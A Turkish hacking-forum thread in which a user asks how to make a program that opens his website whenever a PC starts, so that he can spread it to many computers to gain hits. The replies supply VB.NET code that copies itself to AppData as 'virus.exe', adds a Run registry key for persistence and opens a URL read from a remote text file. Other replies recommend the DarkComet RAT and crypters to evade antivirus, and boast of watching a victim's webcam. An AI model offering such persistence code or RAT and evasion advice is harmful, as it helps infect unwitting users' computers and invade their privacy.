Pc açılınca otomotik istediğim site açılsın istiyorum

berkhakann

Katılımcı Üye
27 Haz 2013
505
0
Konumun kaldırılmasını istiyorum 5

Pc açıldığında otomotik olarak site açılacak yani hangi programla yapabilirim ve başka pclere atmak istiyorum

Son düzenleme:

RAUN

Efsane Grafiker
19 Haz 2011
6,697
113
Reykjavik
Başlat > Çalıştır > Msconfig > Başlangıç sekmesine geçin bildiğiniz uygulamaların pc açılırken açılmasını engelleyin bu engelleme programların sadece bilgisayar açılırken yüklenmesini durdurur programlar yine aç komutu ile istediğinizde açılabilirler :)

cor-vo

Yaşayan Forum Efsanesi
23 Tem 2013
7,984
1
122
Visual Basic var mı bilgisayarında?

Şöyle bir program yapabilirsin formu herşeyi gizlersin form load kısmına yani program başlama kısmına şöyle bir kod eklersin:

Kod:
Start.Process("siteadi.com")

Bilgisayarın açıldığında ayarlanması için başka bir kod kullanabilirsin.

Kod:
Dim veri As String = "C:\Users\kullaniciadi\Desktop\program.exe" 'Program masaüstünde ise             
Dim key As RegistryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True) 
            key.SetValue("program", veri)

Son düzenleme:

berkhakann

Katılımcı Üye
27 Haz 2013
505
0
Visual Basic var mı bilgisayarında?

Şöyle bir program yapabilirsin formu herşeyi gizlersin form load kısmına yani program başlama kısmına şöyle bir kod eklersin:

Kod:
Start.Process("siteadi.com")

Bilgisayarın açıldığında ayarlanması için başka bir kod kullanabilirsin.

Kod:
Dim veri As String = "C:\Users\kullaniciadi\Desktop\program.exe" 'Program masaüstünde ise             
Dim key As RegistryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True) 
            key.SetValue("program", veri)

başkasının bilgisayarı için nasıl yapıcam adamın nereye attığını nerden bilebilirimki :)

DesDeRe*

Kıdemli Üye
3 Nis 2012
3,192
1
STUB
Sadece site açtırmakla kalma bence madem kurbana exe actircaksin rat ile server olustur server olustururken istediğin siteyi açtırma gibi bi olanağıda var darkcomet rat tavsiyemdir . Yapamazsan özel mesaj atabilirsin

Fear-Code

Uzman üye
29 Nis 2012
1,371
0
California
Vb.Net İle Yapabilirsin. Load Kısmına :
Kod:
Registry.CurrentUser.CreateSubKey("SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN").SetValue("Virus", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\virus.exe")
        My.Computer.FileSystem.CopyFile(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\virus.exe")

Sonra Bir Timer Ekleyin Süresini Ayarlayıp İçine Şu Kodu Ekleyin :

Kod:
Process.Start("site linki")

Eğer Site Linkini Değiştirmek vs. İsterseniz Site Destekli De Ayarlayabilirsiniz. Sitenize link.txt Adında Bir Dosya Oluşturun Ve İçine Açılmasını İstediğiniz Site Linkini Yazın. Bunun İçin Timer' a Şu Kodu Yazın :
Kod:
        Dim spy As New System.Net.WebClient
        Process.Start(System.Text.Encoding.ASCII.GetString(spy.DownloadData("http://SİTENİZ/link.txt")))

mma329

Uzman üye
23 Eki 2014
1,626
0
Başlayalım?
Linuxtan server oluştur hem linuxtaki antivirüsleri geçer eğer için rahat etmesse dosyayı windowsa kopyala yapıştır yap sonrada crypter ile hallet nese linuxa kurban gelcektir ardından hiç kasmadan kamerasını izleyip pc sinde istedğin yere istediğin dosyayı fln oluşturabilirsin orneğin yedirtikten sonra ben yapmıştım kurbanın masa üstü pc sine sızdım sonra ise dosya oluşturmuştum sen bu yoldan dosya oluşturarak kodları yaz açıldında senin indexin çıksın bence cok iyi olr :D

berkhakann

Katılımcı Üye
27 Haz 2013
505
0
ya kardeş ben belirli bi kişiye sızmak istemiyorum aklımda bi fikir var toplu kişilere sadece bu tarayıcıya benzer virüsü atıcam binevi siteme hit çekicem adamın her pcsi açıldığında benim sitem otomotik açılacak ne ona ne bana zararlı olacak oyun yöneticisi diye bi site var cs 1.6 indirince pc her açıldığında onun sitede otomotik açılıyo mesela onun gibi bişey istiyorum

berkhakann

Katılımcı Üye
27 Haz 2013
505
0
haaaa demek istediğini anladımda o çok uzun iş ya benim istediğim gibi bişey mümkün değilmi her kişinin teker teker dosyamı oluşturayım :/

mma329

Uzman üye
23 Eki 2014
1,626
0
Başlayalım?
Benim Dediğimi yaparsan çok şey kazanırsın
Not:Neden Daha fazla şey yapmak istemessinki Bence dar bir hedefde gidiyosun hedeflerini genişletirsen daha iyi bir hacker olcağındn eminim binbaşım :D

berkhakann

Katılımcı Üye
27 Haz 2013
505
0
Benim Dediğimi yaparsan çok şey kazanırsın
Not:Neden Daha fazla şey yapmak istemessinki Bence dar bir hedefde gidiyosun hedeflerini genişletirsen daha iyi bir hacker olcağındn eminim binbaşım :D

hacker olmak gibi bi hedefim yok :RpS_smile: az incelememden sonra kayıt defteri ile yaptığını öğrendim setup ile kurdurtup kurulan yere bi internet kısayolu koyduğunu farkettim kayıt defteri ile izin isteyince oluyomuş bu işlem

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.